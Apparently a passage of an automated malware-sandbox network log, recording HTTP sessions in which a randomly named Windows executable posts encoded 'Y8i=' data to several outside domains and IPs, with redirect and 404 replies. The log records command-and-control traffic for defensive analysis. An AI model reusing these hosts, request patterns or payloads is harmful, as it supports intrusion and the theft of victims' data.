Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 17, 2024 08:37:20.466597080 CET | 218 | IN | Data Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 50029 | 67.223.117.169 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 08:37:25.531018972 CET | 772 | OUT | POST /e61w/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Host: www.rtpsilva4d.click
Origin: http://www.rtpsilva4d.click
Referer: http://www.rtpsilva4d.click/e61w/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
Data Ascii: Y8i=XtC1PawhcuAksJQjJkX/RhyWba5ha1fkz78lTJ0MwWre6+ML8rzKXu0MrxNj1svbGw0tYFKPuqzKzNzShLh1jGpkihsdeGKyFyjHJA0rr1Pwth6EVxeuPydEYoWpkXfhIYx2/05NteP7byZ7H/pazs29RV1BGLaEtiH5uVb43snM/NMee6EKsHP+NW40evgp2Q==
Nov 17, 2024 08:37:26.203180075 CET | 479 | IN | HTTP/1.1 404 Not Found
Date: Sun, 17 Nov 2024 07:37:26 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 50030 | 67.223.117.169 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 08:37:28.083425999 CET | 792 | OUT | POST /e61w/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Host: www.rtpsilva4d.click
Origin: http://www.rtpsilva4d.click
Referer: http://www.rtpsilva4d.click/e61w/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
Data Ascii: Y8i=XtC1PawhcuAktpgjFlX/UByXFq5hRVfgz7AlTLYcwE/e5cUL/vHKQu0MgRNq7MuXGwofYF2Puq3KzJ3ShYZ2iWpxkhsbQmKyFyjHJBQVr1XwtwKEElqtTidFI4WpgXftIYxu/2NntcH7b397GupZq832Pl0jLu7pgCC4xkyD8e3h3rdEPLld+HrNQRxATsdgtc/iI+nwpYToJyZanLaAFZo=
Nov 17, 2024 08:37:28.751096964 CET | 479 | IN | HTTP/1.1 404 Not Found
Date: Sun, 17 Nov 2024 07:37:28 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50031 | 67.223.117.169 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 08:37:30.633543015 CET | 10874 | OUT | POST /e61w/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Host: www.rtpsilva4d.click
Origin: http://www.rtpsilva4d.click
Referer: http://www.rtpsilva4d.click/e61w/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 10300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
Data Ascii: Y8i= [TRUNCATED]
Nov 17, 2024 08:37:31.302999973 CET | 479 | IN | HTTP/1.1 404 Not Found
Date: Sun, 17 Nov 2024 07:37:31 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50032 | 67.223.117.169 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 08:37:33.173196077 CET | 505 | OUT | GET /e61w/?Y8i=avqVMth+cNQRkZY2K2P4TQnPCfJBRHrYtZ8WRp4GnmfHlpA3lZroTpAoo3xn6sOeWVk5VUrnhZ7C94/2/OFxplk4lAdpGXqEZWiDVUw5kH/U8gSaCEqLMGU=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Host: www.rtpsilva4d.click
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
Nov 17, 2024 08:37:33.829375982 CET | 479 | IN | HTTP/1.1 404 Not Found
Date: Sun, 17 Nov 2024 07:37:33 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50033 | 3.33.130.190 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 08:37:38.937521935 CET | 769 | OUT | POST /37uf/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Host: www.bearableguy.net
Origin: http://www.bearableguy.net
Referer: http://www.bearableguy.net/37uf/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
Data Ascii: Y8i=UoaxkD4PKncYRjSoP+0S1WuSFyYI9YcpcodhFQYzpxkK3913XSBYP5LzizJ0dC9XlhhRwyISg//ZLSc6yuPN5HDK83gNnZ0+kf+wRE7gsOBS458l4kP/juRpso7hC8hbK//MOFSLbvdZxZvutT5nSssHQo/kxNTZAkUKWMtZKnlBSe289AMRRUVlFE+09vIOyQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50034 | 3.33.130.190 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 08:37:41.473596096 CET | 789 | OUT | POST /37uf/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Host: www.bearableguy.net
Origin: http://www.bearableguy.net
Referer: http://www.bearableguy.net/37uf/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 55 6f 61 78 6b 44 34 50 4b 6e 63 59 52 44 69 6f 4d 64 63 53 7a 32 75 64 63 79 59 49 7a 34 63 54 63 6f 52 68 46 53 31 73 70 43 41 4b 32 63 46 33 57 51 35 59 4f 35 4c 7a 32 6a 4a 39 41 53 39 63 6c 68 74 5a 77 7a 30 53 67 2f 37 5a 4c 51 45 36 79 39 6e 4b 32 33 44 49 6c 6e 67 50 36 4a 30 2b 6b 66 2b 77 52 46 65 33 73 4b 6c 53 34 4a 4d 6c 34 42 69 70 75 4f 52 71 6c 49 37 68 47 38 68 66 4b 2f 2f 75 4f 41 4b 78 62 73 6c 5a 78 5a 2f 75 73 48 4e 6b 4a 38 73 46 4e 59 2f 32 2b 64 79 51 4a 6b 67 48 58 37 46 41 4b 46 6c 33 58 59 6e 6d 73 78 74 47 44 55 78 57 59 44 33 41 77 73 31 48 70 51 78 6f 55 75 31 30 75 47 5a 58 64 61 53 51 6d 50 71 71 4a 54 4d 3d
                                                                                Data Ascii: Y8i=UoaxkD4PKncYRDioMdcSz2udcyYIz4cTcoRhFS1spCAK2cF3WQ5YO5Lz2jJ9AS9clhtZwz0Sg/7ZLQE6y9nK23DIlngP6J0+kf+wRFe3sKlS4JMl4BipuORqlI7hG8hfK//uOAKxbslZxZ/usHNkJ8sFNY/2+dyQJkgHX7FAKFl3XYnmsxtGDUxWYD3Aws1HpQxoUu10uGZXdaSQmPqqJTM=


                                                                                Session ID: 27 | Source IP: 192.168.2.4 | Source Port: 50035 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:37:44.018862963 CET | Bytes transferred: 10871 | Direction: OUT | Data:
                                                                                POST /37uf/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bearableguy.net
                                                                                Origin: http://www.bearableguy.net
                                                                                Referer: http://www.bearableguy.net/37uf/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 55 6f 61 78 6b 44 34 50 4b 6e 63 59 52 44 69 6f 4d 64 63 53 7a 32 75 64 63 79 59 49 7a 34 63 54 63 6f 52 68 46 53 31 73 70 43 49 4b 33 75 4e 33 58 33 74 59 4e 35 4c 7a 71 54 4a 34 41 53 39 64 6c 68 31 6a 77 7a 34 73 67 39 7a 5a 49 78 6b 36 6d 63 6e 4b 68 6e 44 49 34 33 67 4f 6e 5a 30 52 6b 66 76 35 52 46 4f 33 73 4b 6c 53 34 50 67 6c 73 45 4f 70 39 2b 52 70 73 6f 36 67 43 38 68 33 4b 2f 48 55 4f 41 47 62 62 63 46 5a 79 35 50 75 72 30 6c 6b 55 73 73 39 64 49 2b 6c 2b 64 2b 54 4a 6b 39 32 58 2b 35 36 4b 48 35 33 62 63 4f 74 39 31 5a 4e 53 6c 78 4b 4c 7a 44 43 7a 63 31 34 6d 78 5a 4d 45 37 56 49 34 6e 5a 49 5a 36 50 47 37 76 32 75 4c 33 6b 48 43 69 44 72 68 58 38 68 42 79 64 69 48 76 43 33 4f 30 6c 4d 68 56 73 5a 50 44 32 30 48 5a 71 43 46 52 72 50 31 2b 39 72 44 6e 4a 2f 56 4b 51 31 31 78 38 75 68 46 77 43 6b 52 4e 74 6c 76 4d 36 41 31 57 53 69 6b 46 44 41 58 4b 73 49 74 79 57 6a 39 2f 63 69 65 32 52 45 38 2f 74 6b 4c 4f 4a 37 4c 30 53 45 38 68 74 73 48 53 4e 4e 2f 35 6f 42 49 6d 31 68 72 [TRUNCATED]
                                                                                Data Ascii: Y8i= [TRUNCATED]


                                                                                Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 50036 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:37:47.409506083 CET | Bytes transferred: 504 | Direction: OUT | Data:
                                                                                GET /37uf/?gvyXe=EtxTw6OpYVppMB&Y8i=ZqyRn0tKBl8eeDqDLfkB30WUCggn+8okKolBQQUOnigkga9xaBFfdezim29wA1t+01108B0pmPLbZAIUtL3722PCxl5Rmd8Hzuf5Mxa3n4hY0LoX5BPpi6c= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.bearableguy.net
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Timestamp: Nov 17, 2024 08:37:48.045371056 CET | Bytes transferred: 400 | Direction: IN | Data:
                                                                                HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:37:47 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 26 59 38 69 3d 5a 71 79 52 6e 30 74 4b 42 6c 38 65 65 44 71 44 4c 66 6b 42 33 30 57 55 43 67 67 6e 2b 38 6f 6b 4b 6f 6c 42 51 51 55 4f 6e 69 67 6b 67 61 39 78 61 42 46 66 64 65 7a 69 6d 32 39 77 41 31 74 2b 30 31 31 30 38 42 30 70 6d 50 4c 62 5a 41 49 55 74 4c 33 37 32 32 50 43 78 6c 35 52 6d 64 38 48 7a 75 66 35 4d 78 61 33 6e 34 68 59 30 4c 6f 58 35 42 50 70 69 36 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gvyXe=EtxTw6OpYVppMB&Y8i=ZqyRn0tKBl8eeDqDLfkB30WUCggn+8okKolBQQUOnigkga9xaBFfdezim29wA1t+01108B0pmPLbZAIUtL3722PCxl5Rmd8Hzuf5Mxa3n4hY0LoX5BPpi6c="}</script></head></html>


                                                                                Session ID: 29 | Source IP: 192.168.2.4 | Source Port: 50037 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:37:53.140146971 CET | Bytes transferred: 766 | Direction: OUT | Data:
                                                                                POST /kgqw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.funddata-x.net
                                                                                Origin: http://www.funddata-x.net
                                                                                Referer: http://www.funddata-x.net/kgqw/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 7a 38 52 56 78 70 39 61 78 32 41 2f 64 79 68 71 47 55 77 73 69 6e 57 62 7a 46 67 78 48 49 63 4d 58 49 52 76 39 77 57 45 70 2b 68 49 6e 63 52 4b 2f 47 42 70 45 39 33 6d 34 43 43 65 64 70 4a 41 33 4b 59 6a 36 46 73 57 55 31 38 6a 4c 47 70 51 47 34 54 62 4f 5a 2f 6a 50 77 48 67 4e 4d 66 6c 61 61 4d 74 39 54 75 39 73 64 56 63 33 67 6c 57 4b 49 63 34 52 48 46 79 68 2b 49 68 2f 36 74 39 4f 66 30 65 74 44 6c 38 30 6d 48 56 79 4c 65 51 51 5a 65 31 35 54 4d 59 65 44 4e 2f 74 30 68 52 65 41 76 36 67 6b 39 35 6a 45 56 7a 56 47 6e 72 34 6d 65 68 64 65 66 31 4e 62 35 64 6a 2b 2f 4c 47 41 3d 3d
                                                                                Data Ascii: Y8i=z8RVxp9ax2A/dyhqGUwsinWbzFgxHIcMXIRv9wWEp+hIncRK/GBpE93m4CCedpJA3KYj6FsWU18jLGpQG4TbOZ/jPwHgNMflaaMt9Tu9sdVc3glWKIc4RHFyh+Ih/6t9Of0etDl80mHVyLeQQZe15TMYeDN/t0hReAv6gk95jEVzVGnr4mehdef1Nb5dj+/LGA==


                                                                                Session ID: 30 | Source IP: 192.168.2.4 | Source Port: 50038 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:37:55.699189901 CET | Bytes transferred: 786 | Direction: OUT | Data:
                                                                                POST /kgqw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.funddata-x.net
                                                                                Origin: http://www.funddata-x.net
                                                                                Referer: http://www.funddata-x.net/kgqw/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 7a 38 52 56 78 70 39 61 78 32 41 2f 65 57 64 71 56 33 59 73 67 48 57 63 76 56 67 78 4e 6f 63 49 58 49 64 76 39 30 4f 55 70 4d 46 49 70 64 68 4b 2b 45 35 70 48 39 33 6d 73 53 43 62 44 5a 4a 4c 33 4c 6b 64 36 46 41 57 55 31 6f 6a 4c 45 68 51 47 72 37 59 55 70 2f 62 55 67 48 69 56 73 66 6c 61 61 4d 74 39 54 71 58 73 64 64 63 30 51 31 57 49 71 30 37 63 6e 46 78 69 2b 49 68 70 4b 74 78 4f 66 30 38 74 42 42 61 30 6b 50 56 79 50 61 51 51 4e 4b 32 33 54 4d 53 54 6a 4d 63 2b 6b 46 5a 59 77 79 6f 6f 69 55 5a 68 30 64 63 5a 67 32 78 70 58 2f 32 50 65 37 47 51 63 77 70 75 39 43 43 64 45 72 71 64 41 46 49 6a 43 44 58 59 6d 78 55 33 35 75 33 33 34 6f 3d
                                                                                Data Ascii: Y8i=z8RVxp9ax2A/eWdqV3YsgHWcvVgxNocIXIdv90OUpMFIpdhK+E5pH93msSCbDZJL3Lkd6FAWU1ojLEhQGr7YUp/bUgHiVsflaaMt9TqXsddc0Q1WIq07cnFxi+IhpKtxOf08tBBa0kPVyPaQQNK23TMSTjMc+kFZYwyooiUZh0dcZg2xpX/2Pe7GQcwpu9CCdErqdAFIjCDXYmxU35u334o=


                                                                                Session ID: 31 | Source IP: 192.168.2.4 | Source Port: 50039 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:37:58.434643984 CET | Bytes transferred: 10868 | Direction: OUT | Data:
                                                                                POST /kgqw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.funddata-x.net
                                                                                Origin: http://www.funddata-x.net
                                                                                Referer: http://www.funddata-x.net/kgqw/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 7a 38 52 56 78 70 39 61 78 32 41 2f 65 57 64 71 56 33 59 73 67 48 57 63 76 56 67 78 4e 6f 63 49 58 49 64 76 39 30 4f 55 70 4d 4e 49 70 76 70 4b 2f 6a 74 70 47 39 33 6d 76 53 43 61 44 5a 4a 73 33 4b 4d 42 36 46 63 67 55 32 51 6a 4c 6e 35 51 58 4b 37 59 61 5a 2f 62 4c 77 48 6a 4e 4d 66 38 61 61 64 6b 39 54 36 58 73 64 64 63 30 53 64 57 4d 34 63 37 61 6e 46 79 68 2b 49 31 2f 36 73 75 4f 66 4d 47 74 42 46 4b 30 58 58 56 79 72 2b 51 57 2b 79 32 2f 54 4d 63 66 44 4d 36 2b 6b 34 48 59 77 65 61 6f 6d 64 4f 68 32 42 63 50 42 33 57 34 6e 6e 4f 5a 34 36 66 4d 66 41 4e 76 2f 79 75 54 46 44 46 56 69 49 54 38 51 44 2f 43 42 42 59 74 5a 57 54 68 63 54 32 38 35 63 6c 2f 56 42 43 63 6e 78 55 78 58 61 64 31 33 46 51 49 44 45 48 31 76 39 58 38 57 4b 35 5a 7a 58 67 65 31 68 69 37 43 47 49 4b 36 4f 6c 41 62 6b 53 52 4e 73 55 52 56 39 50 75 71 47 6a 62 57 6d 77 43 6c 59 42 59 38 56 77 53 50 33 55 58 72 2b 6e 31 63 68 4f 37 67 49 32 66 33 33 69 65 67 4e 4b 6d 67 6f 54 30 56 64 6a 6e 34 32 63 4f 54 53 4b 35 59 [TRUNCATED]
                                                                                Data Ascii: Y8i= [TRUNCATED]


                                                                                Session ID: 32 | Source IP: 192.168.2.4 | Source Port: 50040 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:38:00.968388081 CET | Bytes transferred: 503 | Direction: OUT | Data:
                                                                                GET /kgqw/?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.funddata-x.net
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Timestamp: Nov 17, 2024 08:38:01.586008072 CET | Bytes transferred: 400 | Direction: IN | Data:
                                                                                HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:38:01 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 38 69 3d 2b 2b 35 31 79 64 56 44 32 47 6f 31 4b 78 68 61 50 33 4d 56 6f 30 2b 68 33 47 30 61 4d 4b 38 56 56 6f 70 78 78 58 79 56 69 76 78 30 37 36 4a 35 37 6c 46 69 4c 4a 71 2f 6f 31 36 52 42 4b 70 35 6b 4e 6b 38 30 30 30 48 53 48 4d 7a 4c 57 35 74 59 39 76 73 61 49 2f 6d 44 69 4b 73 54 64 2f 55 50 6f 5a 6b 37 32 2b 6c 68 2b 35 49 39 78 46 56 46 36 77 39 56 41 41 3d 26 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMB"}</script></head></html>


                                                                                Session ID: 33 | Source IP: 192.168.2.4 | Source Port: 50041 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:38:06.633554935 CET | Bytes transferred: 754 | Direction: OUT | Data:
                                                                                POST /5hlj/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.s9gzg9.vip
